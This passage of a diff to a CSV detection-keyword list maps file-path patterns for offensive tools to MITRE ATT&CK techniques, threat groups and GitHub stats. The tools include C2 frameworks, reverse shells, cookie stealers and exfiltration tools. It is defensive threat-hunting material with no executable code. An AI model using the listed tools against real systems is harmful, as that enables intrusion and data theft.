tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*/Coercer.git*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*/Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*/Coercer/*.py","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"*/coercer_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/coercer.egg-info*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*/Coercer.git*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*/Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*/Coercer/*.py","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*/coercer_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/CoffeeLdr.c*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" "*/CoffeeLdr/*","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","10","10","230","31","2022-11-07T20:56:54Z","2022-07-18T15:21:11Z" -"*/COFFLoader*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","386","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*/COFFLoader*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*/COFFLoader2/*","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","10","10","156","40","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z" "*/collection/screengrab*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" -"*/com/blackh4t/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/com/blackh4t/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/combine_harvester.git*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*/comfoo.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/COM-Hunter.csproj*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" @@ -3125,15 +3131,15 @@ "*/COM-Hunter.git*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" "*/COM-Hunter.sln*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" "*/commandcontrol/malware*.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*/commando-vm*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" -"*/commix.git","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4034","781","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z" -"*/commix.py*","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4034","781","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z" +"*/commando-vm*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*/commix.git","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4035","782","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z" +"*/commix.py*","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4035","782","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z" "*/common/beacon.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*/common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*/completions/exegol.fish*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*/ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"*/config/doNmapScanWin.bat *","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*/ConPtyShell/*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*/ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/config/doNmapScanWin.bat *","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/ConPtyShell/*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*/ContainYourself.git*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*/CookieProcessor.cs*","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","104","14","2023-05-28T18:41:15Z","2023-05-28T18:30:02Z" "*/Cooolis-ms/*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" @@ -3142,44 +3148,44 @@ "*/core/browser_windows.go*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "*/couchdb-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/couchdb-stats.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Covenant*.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*/Covenant.git*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*/Covenant/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*/CovenantUsers/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Covenant*.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Covenant.git*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Covenant/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red 